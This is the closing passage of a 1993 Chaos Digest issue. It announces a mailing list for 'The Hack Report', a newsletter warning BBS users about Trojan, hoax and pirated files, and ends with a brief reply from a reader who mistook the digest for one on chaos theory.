  778.                       The Hack Report List
  779.  
  780.                  [hack@alive.ersys.edmonton.ab.ca]
  781.  
  782. The Hack Report is a monthly informational newsletter put out by Lee
  783. Jackson, Co-Moderator of the FidoNet International SHAREWRE echo and
  784. Moderator of the FidoNet WARNINGS echo which warns of hacked, hoax,
  785. Trojan Hourse, and pirated files that have been seen posted on BBS
  786. systems worldwide.  It is mainly MS-DOS oriented, although it does
  787. have a few notes on programs for other computer platforms.  It is a
  788. great aid for anyone who downloads files from a public access system.
  789.  
  790. There are many people who do not get quack, or any, access to the
  791. latest version of the essential report.  This mailing list has been
  792. created to allow fast efficient distribution of The Hack Report to
  793. people with an Internet mail address who do not have easy access to
  794. it via other means such as anonymous FTP or through FidoNet.  This is
  795. a one-directional list soley for the distribution of The Hack Report
  796. each month.
  797.  
  798. To subscribe to The Hack Report mailing list, please send requests to
  799. the human monitored address hackalive.ersys.edmonton.ab.ca.
  800.  
  801. Owner:  Marc Slemko <marcs@alive.ersys.edmonton.ab.ca>
  802. --
  803. Doug Sewell, Tech Support, Computer Center, Youngstown State University
  804. doug@cc.ysu.edu    doug@ysub.bitnet     <internet>!cc.ysu.edu!doug
  805.  
  806. ------------------------------
  807.  
  808. Date: Mon May 31 23:47:20 -0700 1993
  809. From: park@netcom.com (Bill Park )
  810. Subject: File 5--Autre type de chaos (identification)
  811.  
  812. > that present some security aspects: frauds, hacking, swapping,
  813. > legislation, phreaking...
  814.  
  815. Ooops!  Sorry, I though the journal was about the nonlinear dynamic systems
  816. kind of choas.
  817.  
  818. Never mind,
  819. Bill Park
  820. =========
  821.  
  822. ------------------------------
  823.  
  824. End of Chaos Digest #1.44
  825. ************************************
  826.